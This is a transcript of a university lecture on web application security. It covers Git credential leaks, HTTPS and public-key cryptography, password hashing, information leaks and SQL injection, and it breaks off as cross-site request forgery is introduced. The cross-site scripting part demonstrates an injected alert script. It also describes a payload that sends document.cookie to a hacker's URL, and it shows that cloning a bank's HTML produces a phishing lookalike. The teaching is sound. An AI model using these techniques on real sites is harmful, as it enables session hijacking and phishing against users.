  • [MUSIC PLAYING]

  • BRIAN YU: OK, let's get started.

  • Welcome, everyone, to the final day of CS50 Beyond.

  • And the goal for today is going to be to take a look at things

  • at a bit of a higher level.

  • There is going to be less code in today's lecture.

  • The focus of today is on two main topics--

  • security and scalability-- which are both important as you

  • begin to think about, you're writing all this code for your web application.

  • You're ready to deploy it so that people can actually use it.

  • What are the sorts of considerations you need to bear in mind?

  • What are the security considerations in making

  • sure that wherever you're hosting the application, you and the application

  • itself are secure and that your users are secure from potential vulnerabilities

  • or potential threats?

  • And also, from a scalability perspective,

  • we've been designing applications that so far probably only you

  • or a couple other people have been using.

  • But what sorts of things do you need to think about

  • as your applications begin to scale, as more and more people begin to use it,

  • and you have to begin to think about this idea of multiple people trying

  • to use the same application at the same time?

  • So a number of different considerations come about there.

  • We'll show a couple of code examples.

  • But the main idea of this is going to be high level, just thinking abstractly,

  • sort of trying to design the product, trying to design the project,

  • trying to figure out how exactly we need to be adjusting our application

  • to make sure that it's secure and to make sure that it's scalable.

  • So we'll go ahead and start with security.

  • And on the topic of security, we're going

  • to look at a number of different security considerations

  • as we move all throughout the week, from the beginning of the week

  • until the end of the week, thinking about the types of security

  • implications that come about.

  • And so one of the first things we introduced in the class was Git,

  • the version control tool that we were using

  • to keep track of different versions of our code

  • in order to manage different branches of our code, so on and so forth.

  • And so a couple of important security considerations to be aware of with

  • regard to Git.

  • You all probably created GitHub repositories

  • over the course of this week, maybe for the first time.

  • And GitHub repositories by default are public.

  • And this is in the spirit of the idea of open source software, the idea

  • that anyone can see the code.

  • Anyone can contribute to the code.

  • And that, of course, comes with its trade-offs.

  • On one hand, everyone being able to see the code certainly

  • means that anyone can help you to find bugs and identify bugs.

  • But it also means that anyone on the internet can see the code,

  • look for potential vulnerabilities, and then

  • potentially take advantage of those vulnerabilities.

  • So definitely, trade-offs, costs, and benefits that

  • come along with open source software.

  • And another thing just to be aware of, we mentioned this earlier in the week,

  • but your Git commit history is going to store the entire history of any

  • of the commits that you have made, as the name might imply.

  • And so if you make a commit and you do something

  • you shouldn't have done, for instance-- you make a commit that accidentally

  • includes database credentials inside of the commit somewhere

  • or includes a password inside of the commit

  • somewhere-- you can later on remove those credentials

  • and make another commit and remove the credentials.

  • But the credentials are still there inside of the history.

  • If you go back, you could still find the credentials

  • if you had access to the entire Git repository

  • and could go back and find that point in Git's history.

  • So what are the potential solutions for if you do something like this,

  • accidentally expose credentials at some point in the repository

  • and then remove them?

  • What could you do?

  • Yeah?

  • AUDIENCE: Change the credentials.

  • BRIAN YU: Certainly.

  • Changing the credentials, something you should almost definitely do.

  • Change the password.

  • It's not enough just to remove them and make another commit.

  • And there's also something you can do known as Git purge, where

  • you can effectively purge the history of commits, sort of overwrite history,

  • so to speak, in order to replace that, as well.

  • But even that, if it's been online on GitHub,

  • who knows who may have been able to access the credentials?

  • So definitely always a good idea to remove those, as well.

  • On the first day, we also took a look at HTML.

  • We were designing basic HTML pages.

  • And there are a number of security vulnerabilities

  • you could create just with HTML alone.

  • Perhaps one of the most basic is just the idea that the contents of a link

  • can differ from where the link takes you to.

  • This is probably a pretty obvious point, in that you often

  • have text that links you to a particular page.

  • But this can often be misleading and is commonly

  • used in phishing email attacks, for instance,

  • whereby you have a link that takes you to URL one,

  • but by default, it shows you URL two, which can be misleading, for sure.

  • Or I can have situations where I could--

  • let's go into link.html--

  • I have a link that presumably takes me to google.com.

  • But if I click on google.com, it could take me anywhere else--

  • to some other site, for instance.

  • And the way that it does that is quite simply by just

  • having a link that takes you to a URL, but the contents of that URL

  • are something different or something else entirely.

  • And so that alone is something to be aware of.
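
The mismatch between a link's visible text and its real destination can be checked mechanically. The following is a minimal sketch using only Python's standard library; the names `LinkCollector` and `misleading_links` are hypothetical, and the rule "flag the link when the text looks like a host name but the real host differs" is an assumption chosen for illustration, not a complete phishing detector.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collects (visible text, href) pairs for every <a> tag that has an href."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        # Only record text while we are inside a link.
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def misleading_links(html):
    """Return links whose text looks like a host name that is not the real host."""
    collector = LinkCollector()
    collector.feed(html)
    flagged = []
    for text, href in collector.links:
        host = urlparse(href).hostname or ""
        shown = text.lower()
        looks_like_host = "." in shown and " " not in shown
        matches = host == shown or host.endswith("." + shown)
        if looks_like_host and not matches:
            flagged.append((text, href))
    return flagged


# The link text says google.com, but the href points somewhere else.
page = '<a href="https://example.org/login">google.com</a>'
print(misleading_links(page))
```

A link such as `<a href="https://www.google.com/">google.com</a>` is not flagged, because the real host ends with the text that is shown.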

  • But that problem is compounded when you consider the idea

  • that even though your server-side code-- application code

  • you write in Python and Flask, for instance--

  • you can keep secret from your users, HTML code is not

  • kept secret from users.

  • Any users can see HTML and do whatever they want with it.

  • And so on the first day, you may have been

  • trying to take a look at an HTML page and try and replicate it

  • using your own HTML and CSS, for example.

  • The simplest way to do something like that

  • would just be to copy the source code.

  • So I could go to bankofamerica.com, for instance, Control-Click on the page,

  • view the page source, and all right.

  • Here's all the HTML on Bank of America's home page.

  • I could copy that, create a new file, and call it bank.html.

  • Paste the contents of it in here.

  • Go ahead and save that.

  • And now, open up bank.html.

  • And now, I've got a page that basically looks like Bank of America's website.

  • And now, I could go in.

  • I could modify the links, change where Sign In takes you to,

  • make it take you to somewhere else entirely.

  • And so these are potential threats, vulnerabilities,

  • to be aware of on the internet that are quite easy to actually do.

  • So this is less about when you're designing your own web applications

  • but, when you're using web applications, the types of security

  • concerns to definitely be aware of.

  • So let's keep moving forward in the week-- yeah, question?

  • AUDIENCE: Can you copy JavaScript source code in the same way?

  • BRIAN YU: Yes.

  • Any JavaScript code that is on the client, you can access

  • and you can modify.

  • You can change variables and so on and so forth.

  • And this is actually a pretty easy thing to do.

  • So if I go to like, I don't know, The New York Times website, for instance,

  • and I look at the source code there--

  • let me go ahead and inspect the element, and I'll

  • try and hover over a main headline.

  • OK.

  • This is the name of a CSS class.

  • You could access any JavaScript.

  • You can also run any JavaScript in the console arbitrarily.

  • So I could say, all right, document.querySelectorAll, let's

  • get everything with that CSS class.

  • Or maybe it's just the first one, because it's two CSS classes.

  • All right.

  • Great.

  • I'll take the first one, set its inner HTML to be,

  • like, welcome to CS50 Beyond.

  • And you can play around with websites in order to mess around, change them.

  • So all of the JavaScript CSS classes, all of that,

  • is accessible to anyone who is using the page, for example.

  • Other questions before I go on?

  • Yeah.

  • AUDIENCE: Any thoughts on JavaScript obfuscation?

  • BRIAN YU: JavaScript obfuscation-- certainly something you can do.

  • So since JavaScript is available to anyone who has access to the web page,

  • there are programs called JavaScript obfuscators

  • that basically take plain old looking JavaScript

  • and convert it into something that's still JavaScript

  • but that's very difficult for any human to decipher.

  • It changes variable names and does a bunch of tricks in JavaScript

  • to still execute the exact same way but that looks quite obscure.

  • Definitely something you can do.

  • Still not totally foolproof, because there are ways

  • of trying to deobfuscate JavaScript code, at least to some extent.

  • So it's not perfect, but definitely something that you can do.

  • Other things?

  • All right.

  • Let's take a look at--

  • OK, when we were writing Flask applications,

  • we were writing web servers.

  • And so one thing that's just good to know from a security perspective

  • is the difference between HTTP, the Hypertext Transfer Protocol,

  • and the secure version of it, HTTPS.

  • And that has to do with the idea that on the internet,

  • we have computer servers that are trying to communicate

  • with each other that are trying to send information back and forth.

  • And when these computers are trying to send information back and forth,

  • we would like for that to happen securely,

  • that when one computer is sending information to another computer,

  • that information is going through a number of different routers.

  • And each of those routers could hypothetically

  • have information that's intercepted.

  • Someone could try and intercept a packet on its way from computer number

  • one to computer number two.

  • So how do we securely try and transfer information from one location

  • to the other?

  • And this has to do with the entire field of cryptography,

  • which is a huge field that we're only going to be

  • able to barely scratch the surface of.

  • But the basic idea here is that we would like some way

  • to encrypt our information, that if I have some plain text that I would like

  • to send from my computer to someone else's computer,

  • I would like to encrypt that plain text, send it across in some encrypted way,

  • such that the person on the other end could decrypt it.

  • And so this is perhaps a more sophisticated version

  • of what you might have done in CS50's problem set two

  • when you were using the Caesar or the Vigenère cipher

  • in order to encrypt something.

  • The ciphers that are used in computing on the internet, for instance,

  • are just much more secure, for example.

  • But they follow a similar principle.

  • And so one form of cryptography is called secret-key cryptography,

  • where the idea is that if I am a computer up here

  • and I have some plain text that I want to encrypt,

  • I also have some key that only I know.

  • And I can take the plain text, and I can take that key

  • and run an algorithm on it.

  • And that generates some ciphertext, some encrypted version of the plain text

  • that was encrypted using the key.

  • I can then send that ciphertext along to the other person.

  • And so long as the other person has both the ciphertext and the key

  • used to encrypt it, they can do the same process

  • and just decrypt it, generating the plain text from it.

  • That way, the ciphertext is transferred, not the plain text,

  • from one side to the other side of this communication.

  • And so long as both parties in this instance have access to the same key,

  • they can encrypt and decrypt messages at will.
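
As a rough illustration of the secret-key model just described, here is a toy sketch in which one shared key both encrypts and decrypts. The XOR scheme and the name `xor_cipher` are assumptions chosen for brevity; this is in the spirit of the Caesar and Vigenère ciphers mentioned earlier and is not secure for real use.

```python
from itertools import cycle


def xor_cipher(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key. Applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


key = b"shared-secret"          # both parties must already hold this key
plaintext = b"meet me at noon"

ciphertext = xor_cipher(plaintext, key)   # sender encrypts
recovered = xor_cipher(ciphertext, key)   # receiver decrypts with the same key

print(ciphertext.hex())
print(recovered)
```

Note that the sketch sidesteps the hard part entirely: both sides simply start out with `key`.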

  • Why doesn't this quite work on the internet, though?

  • What is the problem with this model?

  • Yeah?

  • AUDIENCE: If you're sending the key as well as the ciphertext,

  • then it's just as revealing as sending the plain text itself.

  • BRIAN YU: Exactly.

  • When we transfer the ciphertext across, the other person

  • also needs access to the key.

  • We need to transfer the key across the internet,

  • as well, to give it to the other person.

  • And so anyone who is intercepting the ciphertext

  • could also have intercepted the key and therefore could

  • have decrypted the information and gotten the plain text

  • as a result of it.

  • So this secret-key cryptography, ultimately, it

  • doesn't work in the context of the internet

  • if it needs to be the case that the key is just

  • transferred across the internet.

  • Now, you could try encrypting the key, for example.

  • But then whatever key you used to encrypt the key,

  • that also needs to be sent across the internet,

  • and you end up with this problem where you can never figure out a way in order

  • to make sure that information can be transferred securely.

  • So the solution to this lies in a different idea called public-key

  • cryptography, where the idea here is that instead of having one key,

  • we'll have two keys--

  • one called a public key, one called a private key.

  • And the idea here is that a public key is something you can share with anyone.

  • Doesn't matter who has it.

  • And a private key is a key that you keep to yourself

  • that you don't give to anyone, even the person that you're

  • trying to communicate with.

  • And because we have two keys, each key is going to serve a different purpose.

  • They're going to be mathematically related.

  • And take a theory of computing class if you

  • want to understand the exact mathematics behind this.

  • But the basic idea is that the public key can be used to encrypt messages,

  • and the private key can be used to decrypt messages that

  • were encrypted using the public key.

  • And so what does this model look like?

  • Well, I have some public and private key.

  • And if I want some other person to send me information,

  • I will give them my public key.

  • Just give the other person the public key so that they have access to it.

  • Remember, the public key is used to encrypt data.

  • So they can use the public key and encrypt the plain text,

  • generate some ciphertext.

  • And then all the other person needs to do is send me that ciphertext.

  • The ciphertext comes across to me.

  • And I now have the private key, the key that I

  • can use to decrypt the information.

  • And using the private key and the ciphertext,

  • I can then decrypt the message and generate the plain text.

  • So this is the basic idea of public-key cryptography,

  • this idea that we use a public key to encrypt information and a private key

  • to decrypt information.

  • And by separating this out into two different keys,

  • we can share the public key freely without needing

  • to worry about the potential for internet traffic

  • to be intercepted and decrypted, for example.

  • And so this is the basis on which internet security works.
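
The public-key flow above can be sketched with textbook RSA and deliberately tiny numbers. This is an illustration under stated assumptions: the lecture does not name a specific algorithm at this point, the values 61, 53, and 17 are arbitrary, and real systems use far larger keys together with padding schemes that are omitted here.

```python
# Key generation (done once by the person who wants to receive messages).
p, q = 61, 53                  # two small primes; real ones are hundreds of digits long
n = p * q                      # part of both keys
phi = (p - 1) * (q - 1)
e = 17                         # public exponent, chosen coprime to phi
d = pow(e, -1, phi)            # private exponent (modular inverse, Python 3.8+)

public_key = (e, n)            # safe to share with anyone
private_key = (d, n)           # never leaves the owner's machine


def encrypt(message: int, key) -> int:
    exponent, modulus = key
    return pow(message, exponent, modulus)


def decrypt(ciphertext: int, key) -> int:
    exponent, modulus = key
    return pow(ciphertext, exponent, modulus)


message = 65                                   # must be smaller than n
ciphertext = encrypt(message, public_key)      # sender uses the public key
recovered = decrypt(ciphertext, private_key)   # only the private key undoes it

print(ciphertext, recovered)
```

Only the public key and the ciphertext ever cross the network, which is the property the symmetric scheme lacked.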

  • Yeah?

  • AUDIENCE: What if someone else intercepts the ciphertext

  • and they also have a private key?

  • Would they be able to decrypt it?

  • BRIAN YU: If someone else intercepts the ciphertext and they have a private key,

  • they won't be able to decrypt it, because the private key

  • and the public key are mathematically related in such a way

  • that if you encrypt something with a public key,

  • you can only decrypt it with the corresponding private key.

  • And so generally speaking, you'll generate both the public

  • and the private key at the same time, such that only messages encrypted

  • with one can be decrypted with the other.

  • So you can't just have some other random private key and decrypt the message.

  • It can only decrypt messages from the public key.

  • AUDIENCE: So how did this person get that specific [INAUDIBLE]?

  • BRIAN YU: So this person down here generated both the public

  • and the private key at the same time.

  • There's just an algorithm that you can use to randomly generate

  • a public and private key.

  • You share the public key with anyone you want to be able to send you messages.

  • That person you share it with can use the public key to encrypt the message.

  • And then you, the person who generated these keys,

  • can take the encrypted message, use the private key that you generated,

  • and get the plain text out of that.

  • Yeah?

  • AUDIENCE: How difficult is it to get the private key from the public key?

  • Is it impossible?

  • BRIAN YU: How difficult is it to get the private key from the public key?

  • Long story short, we don't really know.

  • We think it is very difficult to do.

  • We think that it would take a very long time.

  • If you took a computer and tried to get it to go from the public key

  • to the private key, we think it would probably take billions, trillions, more

  • years if a computer was operating at top speed trying to do this calculation.

  • But no one has been able to technically prove that it is difficult.

  • And so this is a big open question in computing right now.

  • You can take a theory of computation class

  • for more information on this sort of thing.

  • But there are some open unsolved problems in computing,

  • and this happens to be one of them.

  • Yeah?

  • AUDIENCE: Is it based on primes and very large primes, and you

  • multiply them together?

  • BRIAN YU: Yes, this is basically the idea of very large prime numbers

  • that you multiply together.

  • The long story short of it is it's based on the idea

  • that there are some mathematical operations that are easy

  • and some mathematical operations that are believed to be difficult.

  • And if you take two very big prime numbers,

  • a computer can multiply those numbers very easily

  • and calculate what the product of those two numbers is.

  • It's just a simple multiplication algorithm.

  • But if you have that result, that big product of two prime numbers,

  • it's very difficult to factor that number

  • and figure out which two prime numbers were multiplied together

  • in order to generate that number.

  • And nobody has been able to come up with an efficient algorithm for factoring

  • it.

  • And so as a result, because we believe factoring numbers to be

  • a very difficult problem, we use it as the basis

  • for computing security on the internet.
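
The asymmetry between multiplying and factoring can be seen even at small scale. The sketch below uses naive trial division, which is an assumption made for simplicity; better factoring algorithms exist, but none is known to be efficient for the key sizes used in practice. The function name `factor_semiprime` is hypothetical.

```python
def factor_semiprime(n):
    """Find (p, q) with p * q == n and p <= q by trial division, or None if n is prime."""
    if n % 2 == 0:
        return 2, n // 2
    candidate = 3
    while candidate * candidate <= n:
        if n % candidate == 0:
            return candidate, n // candidate
        candidate += 2
    return None


p, q = 7919, 104729        # the 1,000th and 10,000th primes
n = p * q                  # easy direction: a single multiplication

# Hard direction: the loop has to try thousands of candidates even for
# this small n, and the work grows rapidly as the primes get larger.
print(factor_semiprime(n))
```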

  • Brief teaser of theory of computation.

  • Take any of the 120 series here at Harvard, at least,

  • for more information about that.

  • Other things?

  • Some other security considerations when designing web applications

  • to be aware of-- we mentioned this before,

  • but when it comes to storing credentials,

  • you should generally always store credentials

  • in environment variables inside of your application

  • rather than have inside of your Python code some password,

  • whether it's the secret key of your application,

  • whether it's the credentials to your database,

  • whether it's some other credentials for an API key,

  • for example, that you're using the server to access.

  • Usually best not to put that in the code in case someone else

  • gets access to the code.

  • Generally best to put it in an environment

  • variable, a variable that's just stored in the command line environment

  • where your server's being run from.

  • And then add code that just pulls the credentials from the environment.

  • You can use in Python, at least, os.environ.get

  • to mean get some information from the application's environment.

  • And this is generally going to be a more secure way of doing the same thing.
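
A minimal sketch of pulling a credential from the environment with `os.environ.get`. The variable name `DATABASE_URL` and the helper `load_database_url` are assumptions for illustration; use whatever names your own deployment defines.

```python
import os


def load_database_url():
    """Read the database URL from the environment instead of hard-coding it."""
    url = os.environ.get("DATABASE_URL")   # returns None when the variable is unset
    if url is None:
        # Failing loudly is usually better than silently using a default secret.
        raise RuntimeError("DATABASE_URL is not set")
    return url
```

The value itself would be set outside the code, for example in the shell that starts the server, so it never appears in the repository.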

  • Yeah?

  • AUDIENCE: How do we do that in Heroku if we

  • want to upload our code to the website?

  • BRIAN YU: Yeah.

  • So if you're uploading this to Heroku, if you go to your Heroku application

  • and go to the Settings panel, there is a section,

  • I think it's called config vars, that basically just lets you add environment

  • variables to the Heroku application.

  • And that will automatically set those environment variables such

  • that when you run the application, it can

  • draw from those environment variables.

  • Yeah?

  • AUDIENCE: Is it [INAUDIBLE] yesterday, or is that something

  • you can't have access to?

  • Because if you just did [INAUDIBLE] and then the key,

  • it goes away when you close the terminal, correct?

  • BRIAN YU: Yes.

  • So that's true.

  • So you can certainly, on your own computer,

  • set aliases or environment variables inside

  • of your profile that automatically set credentials in a particular way.

  • The idea is that you never want to be taking those credentials

  • and committing them to a repository that other people might

  • be able to see, for instance.

  • That's where things start to get less secure.

  • OK.

  • Moving on in the week to talk about some other security considerations.

  • We'll talk about SQL, the idea of databases.

  • And when we introduce databases, there are a lot of security considerations

  • that come about.

  • But we'll just touch on a couple of them.

  • The first is how you store passwords.

  • So you can imagine that inside of a database,

  • you might be storing users and passwords together.

  • And maybe we have a whole users table that has an ID column,

  • a column for people's usernames, and a column for people's passwords.

  • And you could imagine just storing passwords inside of the row.

  • But why is this not particularly secure?

  • Yeah?

  • AUDIENCE: If anyone gets access to the data table,

  • they can see what all the passwords are.

  • BRIAN YU: Exactly.

  • If anyone gets access to the database, they immediately

  • have access to all of the passwords.

  • And this is probably not a secure way to go about things,

  • because you probably hear in the news from time

  • to time that databases aren't perfectly secure, that every once in a while,

  • there's some big security vulnerability where someone's able to get access

  • to passwords inside of a database.

  • And that becomes a major security concern.

  • And so one way to try and mitigate this problem

  • is, instead of storing passwords inside of the database,

  • store a hashed version of the password.

  • A hash function, as you might recall from CS50, just takes some input

  • and returns some deterministic output.

  • And a hash function can generally take any input password

  • and turn it into what looks like a whole bunch of random sequences of letters

  • and numbers.

  • And the idea here is that it's deterministic.

  • The same password will always result in the same hash value

  • whereby when someone tries to log in, when they type in their password,

  • rather than just literally compare their password

  • and say does the password match up with the password in this column,

  • you can say, all right, let's hash the password first.

  • And if the hashes match up, then with very high probability,

  • the user actually signed in to the website with the correct password.

  • And you can then log the user in.

  • And now, if someone was able to get access to the database,

  • they wouldn't get access to all the passwords.

  • They would only get access to the password hashes.

  • Now, it's still a security vulnerability,

  • because someone could, in theory, be able to figure out

  • information about the password from the password hashes.

  • But better, certainly, than literally storing the raw text

  • of the password in the database.
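
Here is a hedged sketch of storing and checking a password hash with Python's standard library. The per-user salt and the use of PBKDF2 go beyond what the lecture describes and are assumptions on my part, added because a plain fast hash is easier to attack; the names `hash_password` and `verify_password` and the iteration count are illustrative.

```python
import hashlib
import hmac
import os


def hash_password(password, salt=None):
    """Return (salt, digest). The same password and salt always give the same digest."""
    if salt is None:
        salt = os.urandom(16)   # random per-user salt, stored next to the digest
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


def verify_password(password, salt, stored_digest):
    """Hash the login attempt with the stored salt and compare the digests."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, stored_digest)


# At sign-up: store salt and digest in the users table, never the password.
salt, stored = hash_password("correct horse")

# At login: hash what the user typed and compare.
print(verify_password("correct horse", salt, stored))
print(verify_password("wrong guess", salt, stored))
```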

  • Yeah?

  • AUDIENCE: Do we know how the hash functions generate that code?

  • BRIAN YU: Yeah.

  • The hash functions tend to be deterministic,

  • and you look up what the hash functions themselves are.

  • So there are a couple of quite popular hash functions

  • that are out there that do this sort of thing.

  • But the idea of the hash function is similar to the idea

  • of public and private keys, that it's very easy to hash something,

  • and it's very difficult to go in the other direction.

  • I can easily hash a password and generate

  • something that looks like this.

  • But it's a difficult operation to take something that looks like this

  • and go backwards and figure out what it was that the original password was.

  • And so that's one of the properties of a good hash function.

  • Yes?

  • AUDIENCE: Did you actually hash these, or did you just hit the keyboard?

  • BRIAN YU: I think these are probably--

  • there might be hidden messages here if you look carefully.

  • But separate issue.

  • Other things?

  • OK.

  • So how is it that potential data is leaked as a result of using a database?

  • Well, there are a number of ways that applications can inadvertently

  • leak information.

  • Take a simple example.

  • Oftentimes, you'll see websites that have a Forgot Your Password

  • screen where you type in an email address, and you click Reset Password.

  • And that sends you an email that allows you

  • to reset your password, for example.

  • And you imagine that you type in an email address,

  • and you get, OK, password reset email has been sent.

  • But maybe some applications work such that if you type

  • in an email address that doesn't exist, then

  • you get an error that says, OK, error.

  • There is no user with that email address.

  • What data has this application now exposed?

  • What information can you get just by using this part of a web application,

  • for instance?

  • Yeah?

  • AUDIENCE: You know that that email address is not in the system,

  • so you know that person is not using that app.

  • BRIAN YU: Yeah, exactly.

  • Just using the Forgot Password part of this application,

  • you can tell exactly who has an account for this application

  • and who doesn't just by typing email addresses and seeing what comes back.

  • So there's potential vulnerabilities in terms of data

  • that gets leaked there, as well.
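
One common mitigation for this kind of leak is to return the same response whether or not the account exists. The sketch below assumes a hypothetical in-memory set `REGISTERED_EMAILS` standing in for the users table and a stub `send_reset_email`; neither comes from the lecture.

```python
REGISTERED_EMAILS = {"alice@example.com"}   # hypothetical stand-in for a users table
sent = []                                   # records emails "sent", for demonstration


def send_reset_email(email):
    """Stub: a real application would send an actual email here."""
    sent.append(email)


def request_password_reset(email):
    """Respond identically for known and unknown addresses."""
    if email.strip().lower() in REGISTERED_EMAILS:
        send_reset_email(email)
    # The caller cannot tell from this message whether the account exists.
    return "If an account exists for that address, a reset email has been sent."


print(request_password_reset("alice@example.com"))
print(request_password_reset("nobody@example.com"))
```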

  • And there are all sorts of different ways that information can get leaked.

  • Oftentimes, there's a growing field whereby

  • you can tell just based on the amount of time it takes for an HTTP request

  • to come back whether or not--

  • you can get information about the data inside of a database

  • based on that whereby if you make a request that takes a long time, that

  • can tell you something different than if a request comes back

  • very quickly, because that might mean fewer database requests

  • were required in order to make that particular operation work

  • or any number of different things.

  • And so there are security vulnerabilities there, as well.

  • Final one.

  • I'll briefly mention SQL injection.

  • We've already talked about that.

  • But again, something to be aware of just to make sure

  • that whenever you're making database queries,

  • you're protecting yourself against SQL injection,

  • that you're making sure to either use a library that takes care of this for you

  • or escape any characters that you might be using that

  • could ultimately result in vulnerabilities in SQL.
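
As a sketch of letting a library handle escaping, the example below uses the placeholder syntax of Python's built-in `sqlite3` module. The table layout and the helper `find_user` are assumptions for illustration; other database libraries offer the same idea with slightly different placeholder styles.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
)
conn.execute(
    "INSERT INTO users (username, password_hash) VALUES (?, ?)",
    ("alice", "placeholder-hash"),
)


def find_user(conn, username):
    """Look up a user with a parameterized query; the input is never spliced into the SQL."""
    cursor = conn.execute(
        "SELECT id, username FROM users WHERE username = ?", (username,)
    )
    return cursor.fetchall()


print(find_user(conn, "alice"))
# The injection attempt is treated as a literal (and nonexistent) username.
print(find_user(conn, "alice' OR '1'='1"))
```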

  • Yeah?

  • AUDIENCE: How about the websites or tools

  • like LastPass that store your credentials for other sites?

  • Don't they have to have some way of reversing their own hash on it

  • in order to give you that credential when you go to another site?

  • So when it auto fills your username and password,

  • it has to-- if they're storing a hashed version on their side but filling

  • in the plain text version in the password field,

  • how are they able to reverse that in a way that is secure?

  • They would have to have a table of keys or something

  • that then is just as vulnerable as leaving the password.

  • BRIAN YU: Yeah.

  • So for password manager-type applications, it's a good question.

  • I think the way most of them do this is that you have a master password that

  • unlocks the entire database of the passwords that are stored there.

  • And the idea would be that they're encrypted

  • using the master password as the key to be the unlocker such

  • that they're encrypted.

  • And only by getting the master password correct

  • can you then decrypt the information and then

  • access the plain text version of the passwords that are inside.

  • And so hashing and encryption and decryption are slightly different.

  • In the case of encryption and decryption,

  • you still want to be able to go from the ciphertext back to the plain text,

  • whereas in the case of the password hashing,

  • you don't really care about the ability to reverse engineer it to go backwards.

  • All right.

  • And finally, on the topic of security, we'll

  • talk a little bit about JavaScript.

  • JavaScript opens a whole host of different potential vulnerabilities

  • from a security standpoint.

  • But we'll talk about a couple.

  • The first is this idea called cross-site scripting,

  • or the idea of taking a script and being effectively able to inject it

  • into some other site by putting some JavaScript that the web

  • application didn't intend into the web application itself.

  • And so here's a very simple web application written in Flask.

  • And this is the entire web application.

  • It's got a route, a default route, called / that just returns, "Hello,

  • world!"

  • And it's got an error handler that we didn't really see in the class.

  • But basically, it handles whenever there's

  • a 404 error, whenever you're trying to access a page that was not found.

  • And it just returns, "Not found," followed by request.path, whatever it

  • is that was the URL that you requested.

  • And so I could run this application.

  • I'll go ahead and start up Chrome, and I'll go ahead

  • and go to the source code for XSS1.

  • I'll run this application.

  • Go here.

  • It says, "Hello, world!"

  • And if I go to helloworld/foo, for example, some route that doesn't exist,

  • I get not found, /foo, because that's not a route that's available on this

  • page.

  • I go to /bar.

  • Not found, /bar.

  • What could go wrong here?

  • Where's the security vulnerability, again,

  • thinking in the context of JavaScript?

  • The page my application is returning is literally just "not found"

  • followed by whatever was typed into the request path.

  • And so what I could do is you could imagine that instead of running /foo,

  • I could instead make a request that looks something like /script

  • alert('hi') and then /script, for instance,

  • injecting some JavaScript into the request path whereby if I do that,

  • I say, OK, /script alert('hi') /script.

  • Press Return.

  • And OK, Chrome is being smart about this.

  • Chrome actually isn't allowing me to do this,

  • because Chrome has some more advanced features that are basically

  • saying Chrome detected unusual code on this page

  • and blocked it to protect your personal information and error blocked

  • by XSS auditor.

  • That's cross-site scripting.

  • So Chrome is automatically auditing for this.

  • But not all browsers are like that.

  • And I can, I think--

  • let's see if I can disable--

  • if I disable cross-site scripting protections,

  • I think I can get this to-- yeah, OK.

  • Disabling cross-site scripting protections,

  • we can still type in the URL and actually get some JavaScript

  • that the page didn't intend to still run on this particular web page.

  • And so if someone were to send you a link that took you to this page,

  • /script alert('hi'), you could get JavaScript to run that you

  • didn't intend.
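
The handler described above can be sketched without Flask as a plain function that builds the response body. This is a minimal stand-in, not the lecture's source file: the function names are hypothetical, and the escaped variant is an assumption added for contrast, since the lecture does not show a fix at this point.

```python
from html import escape


def not_found_unsafe(path: str) -> str:
    # Mirrors the handler described above: the path is echoed back verbatim.
    return "Not found: " + path


def not_found_escaped(path: str) -> str:
    # Assumption (not shown in the lecture): escape the path before echoing
    # it, so the browser treats it as text rather than as markup.
    return "Not found: " + escape(path)


# The injected request path from the example above.
payload = "/<script>alert('hi')</script>"
unsafe_body = not_found_unsafe(payload)
safe_body = not_found_escaped(payload)
```

In the unsafe version the script tag reaches the browser intact; in the escaped version the angle brackets arrive as `&lt;` and `&gt;`, so nothing executes.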

  • And maybe that's not a big deal.

  • But it could be a bigger deal in a situation that

  • looks like this, where we have JavaScript

  • and document.write is a function that just adds something to the page.

  • And here, we're loading an image, img src,

  • and the source is some hacker's website.

  • And then we say, cookie= and then document.cookie.

  • Document.cookie stores the cookie for this particular page.

  • And so effectively, what's happening in this script

  • is that your page, when you load it, is going to make a web

  • request to the hacker's URL.

  • And it's going to provide it as an argument whatever

  • the value of your cookie is, for instance.

  • And that cookie could be something that you use in order

  • to log in as the credentials for some website,

  • like a bank application or whatnot.

  • And as a result, the hacker now has access

  • to whatever the value of your cookie is, because they

  • can look at their list of all the requests

  • that have been made to the application much in the same way

  • that you've been able to do in the terminal

  • to see all the requests for your Flask application.

  • And they can see that someone requested hacker_url?cookie= this cookie,

  • and they can then use that cookie to be able to sign in to other sites,

  • as well.
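
To make the last step concrete, here is a small sketch of what reading the cookie back out of a logged request might look like. The log entry and the function name are hypothetical; the only point is that the cookie travels as an ordinary query-string parameter.

```python
from urllib.parse import parse_qs, urlsplit


def cookie_from_logged_request(request_target: str) -> str:
    """Pull the `cookie` query parameter out of a logged request target."""
    query = urlsplit(request_target).query
    values = parse_qs(query).get("cookie", [])
    return values[0] if values else ""


# Hypothetical log entry: the victim's browser requested the image URL
# with the value of document.cookie appended as the query string.
logged = "/?cookie=session%3Dabc123"
stolen = cookie_from_logged_request(logged)
```

Anything the page's JavaScript can read from `document.cookie` can be shipped off this way, which is why the injected script is more than a nuisance.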

  • So most modern browsers, like Chrome, are

  • pretty good at defending against this sort of thing.

  • But definitely something that is a potential vulnerability, especially

  • for older browsers.

  • Questions about this cross-site scripting?

  • Yeah?

  • AUDIENCE: Are you getting the user's cookie,

  • or whose cookie are you getting there?

  • BRIAN YU: Whoever opens the page.

  • So the user's cookie, potentially on an entirely different site.

  • The idea is that if your site is vulnerable to cross-site

  • scripting in this form, then you open up a possibility

  • where someone could generate a link to your website that

  • includes some JavaScript injected like this whereby someone else could

  • steal the cookies of your users on your website.

  • And they could get the cookies for themselves

  • and use those cookies to sign into your website

  • and pretend to be people that they're not, for example.

  • There's a potential security threat there.

  • So cross-site scripting is one example of a JavaScript vulnerability.

  • Another vulnerability is called cross-site request forgery.

  • Imagine that you have a bank website, for instance,

  • and that bank gives you a way to transfer money.

